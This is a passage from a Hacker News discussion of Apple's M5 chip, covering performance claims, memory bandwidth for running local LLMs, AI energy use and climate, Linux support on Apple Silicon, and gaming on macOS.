  • vintagedave 5 hours ago

    What scares me is that my M2 started seeing performance issues in macOS recently. Safari is sometimes slow (I admit I stress it with many tabs, but it wasn't like this a year ago.) Somehow the graphics in general seems slower on Tahoe, eg the effects when minimising a window.

    I am deeply concerned all the performance benefits of the new chips will get eaten away.

    • MobiusHorizons 5 hours ago

      You are probably actually witnessing the reduction in performance of swap as your drive fills up. Check the memory pressure in activity manager. The fix is pretty easy (delete stuff).

      • vintagedave 4 hours ago

        Thanks, but I have over a hundred gig free. And I got the max RAM I could (24GB.) I feel like the machine _should_ be capable in 2025.

    • Tagbert 5 hours ago

      26.0 is very much a dot-zero release. It is missing a lot of optimizations and there are some open bugs like memory leaks. Initial reports on 26.1 show a lot of improvement in those. The 3rd beta of 26.1 just came out yesterday. They will probably launch this new version with improved optimizations by end of October.

  • omikun 3 hours ago

    Says M5 is 4x faster than M4 and 6x faster than M1 for AI compute on the GPU. Basically M4 was only a little faster than M1 at this task. Ex. if M5 is 24 AI TOPS, M4 is 6 AI TOPS, and M1 is 4 AI TOPS.

    Unless you're looking at your MacBook running LM Studio you won't be seeing much improvement in this regard.

  • justinator 5 hours ago

    You know, 64% of statistics are made up.

  • monocasa 5 hours ago

    Each is a different specific benchmark, so they don't stack the way you're doing.

    This is 4-6x faster in AI for instance.

  • foota 5 hours ago

    User experience (for most things, unless you sit there encoding video all day) isn't really related to raw performance so much as latency. Processor power can help there, but design and at the limit memory latency is the key constraint.

  • Jnr 5 hours ago

    It states it is "peak performance". Probably in a very specific use case. Or maybe it reaches the peak for an extremely short period of time before it drops the performance.

  • freehorse 5 hours ago

    They are not 4x more powerful than the previous generation at everything, or even at the same thing every time, so it does not stuck up. Here 4x refers sth wrt LLMs running on the GPU.

    I use both an M1 max and an M3 max, and frankly I do not notice much difference if you control for the core count in most stuff. And for running LLMs they are almost the same performance. I think from M1-M3 there was no much performance increase in general.

  • oulipo2 5 hours ago

    Agreed, if I have 40 tabs opened on Chrome, my M1 macbook is no longer responsive... I'm not sure about their performance claims, apart from some niche GPU rendering for games, which constitutes about 0% of my daily laptop usage

  • tester756 5 hours ago

    Because this is bullshit, lies, marketing

  • potatolicious 4 hours ago

    Because there's more to "actual user experience" than peak CPU/GPU/NPU workload.

    Firstly, the M5 isn't 4-6x more powerful than M4 - the claim is only for GPU, only for one narrow workload, not overall performance uplift. Overall performance uplift looks like ~20% over M4, and probably +100% over M1 or so.

    But there is absolutely a massive sea change in the MacBook since Intel 5 years ago: your peak workloads haven't changed much, but the hardware improvements give you radically different UX.

    For one thing, the Intel laptops absolutely burned through the battery. Five years ago the notion of the all-day laptop was a fantasy. Even relatively light users were tethered to chargers most of the day. This is now almost fully a thing of the past. Unless your workloads are very heavy, it is now safe to charge the laptop once a day. I can go many hours in my workday without charging. I can go through a long flight without any battery anxiety. This is a massive change in how people use laptops.

    Secondly is heat and comfort. The Intel Macs spun their fans up at even mild workloads, creating noise and heat - they were often very uncomfortably warm. Similar workloads are now completely silent with the device barely getting warmer than ambient temp.

    Thirdly is allowing more advanced uses on lower-spec and less expensive machines. For example, the notion of rendering and editing video on a Intel MacBook Air was a total pipe dream. Now a base spec MacBook Air can do... a lot that once forced you into a much higher price point/size/weight.

    A lot of these HN conversations feel like sports car fans complaining: "all this R&D and why doesn't my car go 500mph yet?" - there are other dimensions being optimized for!

yalogin 7 hours ago

It feels like apple is “ a square peg in a round hole” when it comes to AI - atleast for now.

They are not the hardware provider like nvidia, they don’t do the software and services like OpenAI or even Microsoft/oracle. So they are struggling to find a foothold here. I am sure they are working on a lot of things but the only way to showcase them is through their phone which ironically enough feels like not the best path for apple.

Apple’s best option is to put llms locally on the phone and claim privacy (which is true) but they may end up in the same Siri vs others situation, where Siri always is the dumber one.

This is interesting to see how it plays out

  • mirekrusin 7 hours ago

    Being late in AI race or not entering it from training side is not necessarily bad, others have burned tons of money, if Apple enters with their hardware first (only?) it may disrupt status quo from consumer side. It's not impossible that they'll produce hardware everybody will want to run local models that will be on par with closed ones. If this happens it may change real money flow (as opposed to investor based on imaginary evaluation money that can evaporate).

  • mft_ 5 hours ago

    They are the leader in manufacturing consumer systems with sufficient high-bandwidth memory to enable decent-sized LLMs to be run locally with reasonable performance. If you want to run something that needs >=32GB of memory (which is frankly bottom-end for a somewhat capable LLM) they're your only widely-available choice (otherwise you've got the rare Strix Halo AI Max+ 395 chip, or you need multiple GPUs, or maybe a self-build based around a Threadripper.)

    This might not be widely recognised, as the proportion of people wanting to run capable LLMs locally is likely a rounding error versus the people who use ChatGPT/Claude/Gemini regularly. It's also not something that Apple market on, as they can't monetize it. However, as time goes on and memory and compute power gradually decrease in price, and also maybe as local LLMs continue to increase in ability (?) it may become more and more relevant.

    • yalogin 3 hours ago

      All current use cases, the ones that caught the public eye, just don't have a need for locally run LLMs. Apple has to come up with functionality that can work with on-device LLMs and that is hard to do. There aren't that many use cases for it as the input vectors all map to an app or camera. Even then a full fledged LLM is always better than a quantized, low precision one running locally. Yeah, increased compute is the way, but not a silver bullet as Vision and Audio bound LLMs require large amounts of memory

Noaidi 8 hours ago

I am wondering if Apple's focus is off lately with this drive for AI. So far all they are showing in that presentation is that I can have

"the ability to transform 2D photos into spatial scenes in the Photos app, or generating a Persona — operate with greater speed and efficiency."

And by making Apple AI (which is something I do not use for many reasons, but mainly because of Climate Change) their focus, I am afraid they are losing and making their operating Systems worse.

For instance, Liquid Glass, the mess I was lucky enough to uninstall before they put in the embargo against doing so, is, well, a mess. An Aplha release in my opinion which I feel was a distraction from their lack of a robust AI release.

So by blowing money on the AI gold rush that they were too late for, will they ultimately ruin their products across the board?

I am currently attempting to sell my iPhone 16E and my M1 Macbook Air to move back to Linux because of all of this.

  • Tagbert 5 hours ago

    Most of the AI and Machine Learning Apple has done so far are primarily done on device so you can see whether there is any climate change concern or not.

  • knotimpressed 8 hours ago

    Assuming you've read https://andymasley.substack.com/p/a-cheat-sheet-for-conversa... or the longer full essay/related works, could you elaborate on why you don't use Apple Intelligence?

    I totally understand why someone would refuse to use it due to environmental reasons (amongst others) but I'm curious to hear your opinions on it.

    • Noaidi 7 hours ago

      Some commenters already answered for me. To me there is no real use benefit. I am rather a simple user and it seems to take up space on the phone as well. I refuse to use iCloud so space is important to me since photography is what I do the most.

      Also, I like researching things old school how I learned in college because I think it leads to unintended discoveries.

      I do not trust the source you linked to. It is an organization buried under organizations for which I cannot seem to find their funding source after looking for a good 15 minutes this morning. It led me back to https://ev.org/ where I found out one guy used to work for "Bain and Company", a consulting firm, and was associated with FTX funding:

      https://oxfordclarion.uk/wytham-abbey-and-the-end-of-the-eff...

      Besides "Effective Altruism" makes no sense to me. Altruism is Altruism IMO.

      Altruism: unselfish regard for or devotion to the welfare of others

      There is no way to be ineffective at altruism. The more you have to think about altruism the further you get from it.

      But the organization stinks as some kind of tech propaganda arm to me.

    • sylens 7 hours ago

      > could you elaborate on why you don't use Apple Intelligence?

      Why would I trust this when they can't deliver a voice assistant that can parse my sentences beyond "Set a reminder" or "Set a timer"? They have neglected this area of their products for over a decade, they are not owed the benefit of the doubt

    • adastra22 3 hours ago

      > I totally understand why someone would refuse to use it due to environmental reasons

      Huh. This one baffles me.

    • pcdoodle 7 hours ago

      For me: unproven trust and no killer feature.

      If I can't search my Apple Mail without AI, why would I trust AI?

    • timeon 6 hours ago

      Not sure why would one think that article is something other than distraction attempt. Because emissions are adding up.

      I'm from country (in Europe) where CO2 emissions per capita [0] are 5.57 while number for USA is 14.3, so reading this sentence in that article: "The average American uses ~50,000 times as much water every day..." surly does not imply that one should use ChatGPT because it is nothing. If "average American" wants to decrease emissions then not using LLMs is just start.

      [0]: https://ourworldindata.org/grapher/co-emissions-per-capita

  • StopDisinfo910 8 hours ago

    > making Apple AI [...] their focus

    Are they really doing that? Because if it's the case they have shockingly little to show for it.

    Their last few attempts at actual innovation seem to have been less than successful. The Vision Pro failed to find a public. Liquid Glass is to put it politely divisive.

    At that point to me, it seems that good SoC and a captive audience in the US are pretty much all they have remaining and competition on the SoC part is becoming fierce.

    • Noaidi 7 hours ago

      Yeah, I agree, they have a captive audience for sure. But they still need to satisfy share holders. If people are failing to upgrade that is a problem. And the battery drain on my iPhone 16e on Glass was horrific. I know casual users who did not notice until I pointed it out and they were tracking it better. This, unfortunatly, makes me think conspiratorially. Even a modest about of extra battery use and degradation will mean more upgrades in the future.

      But I think $500 billion is a lot of money for AI:

      Apple accelerates AI investment with $500B for skills, infrastructure

      https://www.ciodive.com/news/Apple-AI-infrastructure-investm...

      Imagine using $500 for the operating system and squashing bugs or making the system even more energy efficient? Or maybe figuring out how to connect to an android tablet's file system natively?

  • steinvakt2 8 hours ago

    If you don’t use AI for climate reasons then you should read the recent reports about how little electricity and water is actually used. It’s basically zero (image and video models excluded). Your information about this is probably related to GPT3.5 or something. Which is now 3 years old - a lifetime in AI world.

    • greekrich92 8 hours ago

      Big data centers running tons of GPUs and the construction of even bigger ones is not carbon neutral come on

    • wat10000 8 hours ago

      Don't newer models use more energy? I thought they were getting bigger and more computationally intensive.

      • trenchpilgrim 8 hours ago

        They use a massive amount of energy during training. During inference they use a tiny amount of energy, less than a web search (turns out you can be really efficient if you don't mind giving wrong answers at random, and can therefore skip expensive database queries!)

        • wat10000 6 hours ago

          Right, but the comment I was responding to suggested that ChatGPT3.5 used lots of energy and newer models use less.

          • trenchpilgrim 3 hours ago

            Indeed, this is correct. See today's Claude Haiku 4 announcement for an example.

  • imcritic 8 hours ago

    I think they will continue ruining their products via software updates. That's implied by a walled garden approach they chose to do their business: this forces users to consoom more and thus generates profits. Apple isn't a "lean" company, it needs outrageous profits to stay afloat.

  • jeffbee 7 hours ago

    I'm interested in reading about your low-carbon lifestyle that is so efficient you got to the point of giving up machine inference.

    • Noaidi 6 hours ago

      I live in a van full time. I have a 200w solar panel and a 1500w output solar battery that powers everything I use, mostly for cooking, sometimes heat. I also poop in the woods a lot. :) I do not use the internet much really. Driving is my biggest carbon footprint but I really do not put much more mileage than the average suburban person. Anyway, I try my best. I am permanently disabled so that makes a lot of it easier. Being poor dramatically lowers ones carbon footprint.

      • jeffbee 5 hours ago

        If you drive a van as much as the average suburbanite drives their vehicle, emitting ~10 metric tons of CO2 annually, posting about how you gave up local machine inference for the climate is performative and asinine. Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less.

        • leakycap 3 hours ago

          What a nice way to talk to another person who... didn't attack you?

          A typical passenger car driving 12,000 miles puts out about 5 metric tons of C02

          The person driving that passenger car likely has a 1,000 sq ft or larger home or apartment, which can vary widely but could be reasonably estimated at another 5 metric tons of C02 (Miami vs. Minnesota makes a huge difference)

          So we're at 10 metric tons for someone who doesn't live in a van but still drives like a suburbanite

          Care to be a little kinder next time you feel whatever compelled you to write you response to the other user? Jeesh.

        • Noaidi 2 hours ago

          First, I need my van. My van is my house.

          > Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less

          Still, even lets say your number are correct (and I feel they are not), does that mean I should just add to the problem and use something I do not need?

          Driving my van for my yearly average creates about 4.4 metric tons of CO2.

          "A more recent study reported that training GPT-3 with 175 billion parameters consumed 1287 MWh of electricity, and resulted in carbon emissions of 502 metric tons of carbon, equivalent to driving 112 gasoline powered cars for a year."

          https://news.climate.columbia.edu/2023/06/09/ais-growing-car...

          Just to get an idea of how I conserve, another example is I only watch videos in 480 becasue it uses less power. This has a double benefit for me since it saves my solar battery as well.

          I am not bragging, just showing what is possible. Right now, being tsill this week in the desert, my carbon footprint is extremely low.

          Second, I cannot really trust most numbers that are coming out regarding AI. Sorry, just too much confusion and green-washing. For example, Meta is building an AI site that is about the size of Manhattan. Is all the carbon used to build that counted in the equations?

          But this paper from 5/25:

          https://www.technologyreview.com/2025/05/20/1116327/ai-energ...

          says "by 2028 more than half of the electricity going to data centers will be used for AI. At that point, AI alone could consume as much electricity annually as 22% of all US households."

          And

          "Tallies of AI’s energy use often short-circuit the conversation—either by scolding individual behavior, or by triggering comparisons to bigger climate offenders. Both reactions dodge the point: AI is unavoidable, and even if a single query is low-impact, governments and companies are now shaping a much larger energy future around AI’s needs."

          And

          "The Lawrence Berkeley researchers offered a blunt critique of where things stand, saying that the information disclosed by tech companies, data center operators, utility companies, and hardware manufacturers is simply not enough to make reasonable projections about the unprecedented energy demands of this future or estimate the emissions it will create. "

          So the confusion and obfuscation is enough for me to avoid it. I think AI shoudl be restaind to research, not to be used from most of the silliness adn AI slop that is being produced. Because yiou know, we are not even counting the AI slop views that also take up data space and energy by people looking at it all.

          But part if why I do not use it is my little boycott. I do not like AI, at least how it is being misused to create porn and AI slop instad of doing the great things it might do. They are misusing AI to make a profit. And that is also what I protest.

    • timeon 6 hours ago

      Depends where you are. People in some countries have lot of catching up: https://ourworldindata.org/grapher/co-emissions-per-capita

      Maybe they are in USA - every little think counts there.

      • Noaidi 6 hours ago

        I am in the US, and thanks for that link. I am of the opinion that the Climate Crisis should be the number one focus for everyone right now.

        So, to keep this on point, Apple making a faster chip is not on my climate change agenda and anything but negative.

      • jeffbee 5 hours ago

        No, in the USA it is the opposite. The little things do not and cannot add up to anything. The only things that make a difference are motor fuels and hamburgers.

nik736 8 hours ago

This is only the base model, no upgrades yet for the Pro/Max version. The memory bandwidth is 153GB/s which is not enough to run viable open source LLM models properly.

  • replete an hour ago

    Looks like the M5 base has LPDDR5x-9600, which works out to 153.6 from base M4's 120GB/s DDR5x-7500. The Pro/Max versions have more memory controllers, 16, 24 and 32 channels accordingly. The 32 channel M5 top-end version will have 614GB/s by my calculations.

    It would take 48 channels of DDR5x-9600 to match a 3090's memory bandwidth, so the situation is unlikely to change for a couple of years when DDR6 arrives I guess

  • wizee 8 hours ago

    153 GB/s is not bad at all for a base model; the Nvidia DGX Spark has only 273 GB/s memory bandwidth despite being billed as a desktop "AI supercomputer".

    Models like Qwen 3 30B-A3B and GPT-OSS 20B, both quite decent, should be able to run at 30+ tokens/sec at typical (4-bit) quantizations.

    • zamadatix 7 hours ago

      Even at 1.8x the base memory bandwidth and 4x the memory capacity Nvidia spent a lot of time talking about how you can pair two DGXs together with the 200G NIC to be able to slowly run quantized versions of the models everyone was actually interested in.

      Neither product actually qualifies for the task IMO, and that doesn't change just because two companies advertised them as such instead of just one. The absolute highest end Apple Silicon variants tend to be a bit more reasonable, but the price advantage goes out the window too.

      • cma 7 hours ago

        M5 says 3X thunderbolt 5, should be able to do 240G bidirectional in total. Not that useful yet with max 32GB of RAM though.

  • mpeg 8 hours ago

    The memory capacity to me is an even bigger problem, at 32GB max.

    • sgt 8 hours ago

      That'll come in the MacBook Pro etc cycle, like last time, then you'll have 512GB RAM

      • bombcar 8 hours ago

        Is the M4 Ultra even out yet? I can't see anything with 512 GB but the M3 Ultra on the Mac Studio (for a cool $4000 more).

        • asimovDev 7 hours ago

          i am interested in seeing if they skip m4 and go straight to M5 and only make that available in the Pro. From my unscientific observations it seems that chips are running hotter and hotter, I wouldn't be surprised if M5 Ultra would struggle in a Studio and would require cooling performance of the Mac Pro case

      • mpeg 8 hours ago

        Same with bandwidth though, usually pro/max memory has much higher speed

        • andy_ppp 7 hours ago

          Yes the M4 Base has 120 GB/s, Pro 273 GB/s and Max has 546 GB/s... That means M5 Pro is potentially around 348 GB/s and M5 Max is almost at 700 GB/s - for comparison a 4090 has around 1,000 GB/s. So pretty incredible!

          • replete an hour ago

            I think the M5 Max will be more like 614GB/s, unless they somehow have exceeded DDR5x-9600 or added more than 32 memory controllers

          • sgt 5 hours ago

            Also I think even an M3 Ultra is more cost effective at running LLMs than 4090 or 5090. Mostly due to being more energy efficient. And less fragile than running a gamer PC build.

            • andy_ppp 4 hours ago

              It can run larger models quite slowly but lacks matmul acceleration (included in the M5) that is very useful for context and prompt performance at inference time. I will probably burn my budget with an M5 Max with 256gb (maybe even 512gb) memory, the price will be upsetting but I guess that is life!

              • sgt 3 hours ago

                Yes! I think smaller models on the M3 Ultra is interesting enough, but now with matmul/ tensors on M5 Ultra or Max, with decent unified mem, it will be a gamechanger.

                I can easily imagine companies running Mac Studios in prod. Apple should release another Xserve.

    • iyn 7 hours ago

      Yeah, that's my main bottleneck too. Constantly at 90%+ RAM utilization with my 64GiB (VMs, IDEs etc.). Hoping to go with at least 128GiB (or more) once M5 Max is released.

  • czbond 8 hours ago

    I am interested to learn why models move so much data per second. Where could I learn more that is not a ChatGPT session?

    • Sohcahtoa82 6 hours ago

      Models are made of "parameters" which are really weights in a large neural network. For each token generated, each parameter needs to take its turn inside the CPU/GPU to be calculated.

      So if you have a 7B parameter model with 16-bit quantization, that means you'll have 14 GB/s of data coming in. If you only have 153 GB/sec of memory bandwidth, that means you'll cap out ~11 tokens/sec, regardless of how my processing power you have.

      You can of course quantize to 8-bit or even 4-bit, or use a smaller model, but doing so makes your model dumber. There's a trade-off between performance and capability.

      • adastra22 3 hours ago

        I think you mean GB/token

        • Sohcahtoa82 3 hours ago

          Err...yup. My bad. Can't edit it now.

    • modeless 8 hours ago

      The models (weights and activations and caches) can fill all the memory you have and more, and to a first (very rough) approximation every byte needs to be accessed for each token generated. You can see how that would add up.

      I highly recommend Andrej Karpathy's videos if you want to learn details.

      • pfortuny 7 hours ago

        A very simplified version is: you need all the matrix to compute a matrix x vector operation, even if the vector is mostly zeroes. Edit: obviously my simplification is wrong but if you add up compression, etc… you get an idea.

      • rs186 6 hours ago

        Would you mind specifying which video(s)? He has quite a lot of content to consume.

  • diabllicseagull 7 hours ago

    You don’t want to be bandwidth-bound, sure. But it all depends on how much compute power you have to begin with. 153GB/s is probably not enough bandwidth for an Rtx5090. But for the entry laptop/tablet chip M5? It’s likely plenty.

  • chedabob 7 hours ago

    My guess would be those are going into the rumoured OLED models coming out next year.

  • hu3 8 hours ago

    Enough or not, they do describe it like this in an image caption:

    "M5 is Apple’s next-generation system on a chip built for AI, resulting in a faster, more efficient, and more capable chip for the 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro."

  • Tepix 7 hours ago

    With MoE LLMs like Qwen 3 30B-A3B that's no longer true.

  • quest88 8 hours ago

    What do you mean by properly? What’s the behavior one would observe if they did run an llm?

    • burnte 8 hours ago

      "Properly" means at some arbitrary speed that the writer would describe as "fast" or "fast enough". If you have a lower demand for speed they'll run fine.

    • nik736 8 hours ago

      If you have enough memory to load a model, but not enough bandwidth to handle it, you will get a very low token/s output.

      • Rohansi 5 hours ago

        You can also have enough bandwidth but be compute limited and get lower performance than expected. This is more likely to be the case for Apple Silicon vs. high power GPUs.

bfrog 7 hours ago

The big win would be a linux capable device. I don't have any interest in mac os x but the apple m parts always seem amazing.

In theory this would be where qualcomm would come in and provide something but in practice they seem to be stuck in qualcomm land where only lawyers matter and actual users and developers can get stuffed.

  • cogman10 7 hours ago

    Yeah, this is the biggest hole in ARM offerings.

    The only well supported devices are either phones or servers with very little in between.

    Even common consumer devices like wifi routers will have ARM SOCs with pinned version of the kernel they are attached to which will get supported for 1 to 2 years at most.

  • mrkeen 7 hours ago

    I have a pretty good time on Asahi Fedora (macbook air M1). It supposedly also supports M2 but no higher.

    And it's a PITA to install (needs to be started within macosx, using scripts, with the partitions already in a good state)

    • mysteria 2 hours ago

      The issue is that it's hacky, and in that case I'd rather go with a Intel or AMD x86 system with more or less out of the box Linux support. What we're looking for is a performant ARM system where Linux is a first class citizen.

    • Gethsemane 7 hours ago

      If I was less lazy I could probably find this answer online, but how do you find the battery life these days? I'd love to make the switch, but that's the only thing holding me back...

    • 2OEH8eoCRo0 7 hours ago

      How's Thunderbolt and display port alt mode?

littlecranky67 8 hours ago

And here I am, selling my Macbook M4 Pro to buy a Macbook Air and a dedicated gaming machine. I've tried gaming on the Macbook with Heroic, GPTK, Whiskey, RPCS3 emu and some native. When a game runs, the performance is stunning for a Laptop - but there is always glitches, bugs and annoyances that take out the joy. Needles to mention lack of support from any sort of online multiplayer, due to the lack of anticheat support.

I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

  • ryao 8 hours ago

    Off the top of my head, here is what that needs:

      1. Implementing PR_SET_SYSCALL_USER_DISPATCH
      2. Implementing ntsync
      3. Implementing OpenGL 4.6 support (currently only OpenGL 4.1 is supported)
      4. Implementing Vulkan 1.4 with various extensions used by DXVK and vkd3d-proton.
    
    That said, there are alternatives to those things.

      1. Not implementing this would just break games like Jurassic World where DRM hard codes Windows syscalls. I do not believe that there are many of these, although I could be wrong.
      2. There is https://github.com/marzent/wine-msync, although implementing ntsync in the XNU kernel would be better.
      3. The latest OpenGL isn't that important these days now that Vulkan has been widely adopted, although having the latest version would be nice to have for parity. Not many things would suffer if it were omitted.
      4. They could add the things needed for MoltenVK to support Vulkan 1.4 with those extensions on top of Metal:
    
    https://github.com/KhronosGroup/MoltenVK/issues/203

    It is a shame that they do not work with Valve on these things. If they did, Proton likely would be supported for MacOS from within Steam and the GPTK would benefit.

  • bob1029 8 hours ago

    > lack of anticheat support.

    I just redid my windows machine to get at TPM2.0 and secure boot for Battlefield 6. I did use massgrave this time because I've definitely paid enough Microsoft taxes over the last decade. I thought I would hate this new stuff but it runs much better than the old CSM bios mode.

    Anything not protected by kernel level anti cheats I play on my steam deck now. Proton is incredible. I am shocked that games like Elden Ring run this well on a linux handheld.

  • dlojudice 8 hours ago

    Good point. Many people (including me) switched to Apple Silicon with the hope (or promise?) of having just one computer for work and leisure, given the potential of the new architecture. That didn't happen, or only partially, which is the same.

    In my case, for software development, I'd be happy with an entry-level MacBook Air (now with a minimum of 16GB) for $999.

  • unsupp0rted 8 hours ago

    I can't sell my MacBook Pro because the speakers are so insanely good. Air can't compare. The speakers are worth the extra kilos.

    • HDThoreaun 6 hours ago

      I have never once used my laptop speakers. Not saying youre wrong but its crazy how different priorities for products can be

      • prewett 3 hours ago

        I shocked when I tried out the 2019 MBP speakers, they were almost as good as my (low-end) studio headphones. I was even more shocked with the M2 speakers, which are arguably better (although not as flat frequency response, I think, there definitely is something a little artificial, but it sounds really good). I really could not imagine laptop speakers being even close to par to decent headphones. Perhaps they aren't on par with $400 headphones, I've never had any of those. But now by preference I listen on the laptop speakers. It's not a priority--I'm totally happy to go back to the headphones--more like an unexpected perk.

        • adastra22 3 hours ago

          But why would you ever use the speakers?

          • unsupp0rted 25 minutes ago

            I work alone- I can use the speakers at any volume without bothering anybody or wearing anything in my ears or on my head. It's wonderful.

  • hannesfur 8 hours ago

    I agree—the difference between the different compatibility layers and native games is very steep at times. Death Stranding on my M2 Pro looks so good it’s hard to believe, but running GTA Online is so brittle and clunky… Even when games have native macOS builds, it’s rare to find them with Apple Silicon support (and even rarer with Metal support). There is a notable exception though: Arma 3 has experimental Apple Silicon support, though it comes with significant limitations. (Multiplayer, flying & mods) Although I don’t believe it’s in Apple’s interest, gaming on Linux might become an option in the future, even on Mac, but the lack of ARM builds is an even bigger problem there…

    Since I am playing mostly MSFS 2024 these days I currently use GeForce Now which is fine, but cloud gaming isn’t still quite there yet…

    • kllrnohj 7 hours ago

      > Death Stranding on my M2 Pro looks so good it’s hard to believe,

      Death Stranding is a great looking game to be sure, but it's also kinda hard to get excited about a 5 year old game achieving rtx 2060 performance on a $2000+ system. And that was apparently worthy of a keynote feature...

  • gbil 6 hours ago

    On top of that, what is the strategy from Apple on gaming? Advertise extra performance and features that you only get if you upgrade your whole device? This is non-sustainable to put it mildly. There are egpu enclosures with TB5, developing something like that for the Mac would make more sense if they really cared about gaming anyhow.

  • ge96 7 hours ago

    I'm gonna be looking for a 4080 in SFF form factor since my current gaming rig can't get upgraded to win 11. Also I wouldn't mind a smaller desktop.

    edit: for now I'll get that win 10 ESU

  • gwbas1c 8 hours ago

    Honestly, gaming consoles are so much cheaper and "no hassle." I never games on my Mac.

    • littlecranky67 6 hours ago

      More expensive on the long run, as the games are more expensive and you need some kind of subscription to play online.

  • dimgl 8 hours ago

    Yeah I agree. If it weren't for gaming I would have already uninstalled Windows permanently. It's really unfortunate because it sticks out as the one product in my house that I truly despise but I can't get rid of, due to gaming.

    I've been trying to get Unreal Engine to work on my Macbook but Unity is an order of magnitude easier to run. So I'm also stuck doing game development on my PC. The Metal APIs exist and apparently they're quite good... it's a shame that more engines don't support it.

  • bamboozled 8 hours ago

    Sometimes I just feel like buying the latest and greatest game, I have an m4 too, the choices are usually quite abysmal. I agree.

    • qnpnp 5 hours ago

      My solution is cloud gaming in that case, such as GeforceNow (for compatible games), or Shadow (for a whole PC to do as you please).

  • sapiogram 8 hours ago

    > I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

    Note that games with anticheat don't work on Linux with Proton either. Everything else does, though.

    • dralley 8 hours ago

      Several games with anticheat work. But it's up to the developers whether they check the box that allows it to work, which is why even though both Apex Legends and Squad use Easy Anticheat, Squad works and Apex does not.

      Of course some anticheats aren't supported at all, like EA Javelin.

      • ascagnel_ 6 hours ago

        Apex Legends is an interesting case because EA/Respawn initially shipped with first-class support for the Steam Deck (going as far as to make changes to the game client so it would get a "Verified" badge from Valve) -- including "check[ing] the box that allows it to work". However, the observation was that the anti-cheat code on Linux wasn't as effective, so they eventually dropped support for it.

        https://forums.ea.com/blog/apex-legends-game-info-hub-en/dev...

    • rpdillon 8 hours ago

      Many of them do, but it's a game of cat and mouse, so it's more hit and miss than I would like.

  • mrcwinn 7 hours ago

    Going back to the Air's screen from your Pro will be a steep fall.

    • littlecranky67 6 hours ago

      Not really, 95% of the time I use it in a dock with 2 external screens.

  • gjsman-1000 8 hours ago

    Many people blame the lack of OpenGL/Vulkan... but I really don't buy it. It doesn't pass the sniff test as an objection. PlayStation doesn't support OpenGL/Vulkan (they have their own proprietary APIs, GNM, GNMX, PSSL). Nintendo supports Vulkan but performance is so bad, almost everyone uses the proprietary API (NVN / NVN2). Xbox obviously doesn't accept OpenGL/Vulkan either, requiring DirectX. Understanding of Metal is widespread in mobile gaming, so it's weird AAA couldn't pull from that industry if they wished.

    • coldpie 8 hours ago

      The primary reason is Apple's environment is too unstable for gaming's most common business model. Most games are developed, released, and then sold for years and years with little or no maintenance. Additionally, gamers expect the games they purchased to continue to work indefinitely. Apple regularly breaks backwards compatibility in a wide variety of ways (code signing requirements; breaking OS API changes; hardware architecture changes). That means software run on Apple OSes must be constantly maintained or else it will eventually stop working. Most games aren't developed like that.

      No one who was forced to write a statement like [this](https://help.steampowered.com/en/faqs/view/5E0D-522A-4E62-B6...) is going to be enthusiastic about continuing to work with Apple.

      • galad87 8 hours ago

        Game developers make most of the money shortly after a game release, so having a 15 years old game not working anymore shouldn't make much difference in term of revenues.

        Anyway, the whole situation was quite bad. Many games were still 32-bit, even if macOS itself had been mainly 64-bit for almost 10 years or more. And Valve didn't help either, the Steam store is full of 64-bit mislabeled as 32-bit. They could have written a simple script to check whether a game is actually 64-bit or not, instead they decided to do nothing and keep their chaos.

        The best solution would have been a lightweight VM to run old 32-bit games, nowadays computer are powerful enough to do so.

      • gjsman-1000 8 hours ago

        I've heard this argument, but it also doesn't pass the sniff test in 2025.

        1. When is the next transition on bits? Is Apple going to suddenly move to 128-bit? No.

        2. When is the next transition on architecture? Is Apple going to suddenly move back to x86? No.

        3. When is the next API transition? Is Apple suddenly going to add Vulkan or reinvigorate OpenGL? No. They've been clear it's Metal since 2014, 11 years ago. That's plenty of time for the industry to follow if they cared, and mobile gaming has adopted it without issue.

        We might as well complain that the PlayStation 4 was completely incompatible with the PlayStation 3.

        • fruitworks 8 hours ago

          What happens when apple switches to riscv, or depreciates versions of metal in a backwards incompatible way, or mandates some new code signing technique?

          The attitude in the apple developer ecosystem is that apple tells you to jump, and you ask how high.

          You could complain that Playstation 4 software is incompatible with Playstation 3. This is the PC gaming industry, there are higher standards for the compatibility of software that only a couple companies can ignore.

          • gjsman-1000 8 hours ago

            Apple will never transition to RISC-V; especially when they cofounded ARM. They have 35 years of institutional knowledge in ARM. Their cores and techniques are licensed and patented with mixtures of their own IP and ARM-compatible IP. That is decades away, if ever. Even the assumption RISC-V will eventually achieve equality with ARM performance is untested; as sometimes ISAs do fail at scale (Itanium anyone? While unlikely to repeat; even a discovered 5% structural difference in the negative would handicap adoption permanently.)

            "This is the PC gaming industry"

            Who said Apple needed to present themselves as a PC gaming alternative over a console alternative?

            • fruitworks 7 hours ago

              Consoles are dying and PCs are replacing them. Like the original commenter suggested, people want to run PC games. The market has decided that the benefits of compatibility outweigh the added complexity. On the PC you have access to a massive expanding back-catalog of old software, far more competition in the market, mods, and you're able to run whatever software you want alongside games (discord, teamspeak, game streaming, etc.).

              Macs are personal computers, whether or not they come from some official IBM Personal Computer compatibility bloodline.

              • gjsman-1000 7 hours ago

                Steam Deck - 6 million

                Sega Saturn - 9 million

                Wii U - 13 million

                PlayStation 5 - 80 million

                Nintendo Switch - 150 million

                Nintendo Switch 2 opening weekend - 4 million in 3 days

                Sure.

                • Sohcahtoa82 6 hours ago

                  And in the last 48 hours, Steam peaked at 39.5M users online, providing a highly pessimistic lower-bound on how many PC gamers there are.

                  https://store.steampowered.com/stats/stats/

                  If you consider time zones (not every PC gamer is online at the same time), the fact that it's not the weekend, and other factors, I'd estimate the PC gaming audience is at least 100M.

                  Unfortunately, there's no possible way to get an exact number. There are multiple gaming PC manufacturers, not to mention how many gaming PCs are going to be built by hand. I'm part of a PC gaming community, and nearly 90% of us have a PC built by either themselves or a friend/family. https://pdxlan.net/lan-stats/

        • coldpie 8 hours ago

          I mean, I worked in this space, and I'm telling you why many of the people I worked with weren't interested in supporting Apple. I'm happy to hear your theories if you don't like mine, though.

          • gjsman-1000 8 hours ago

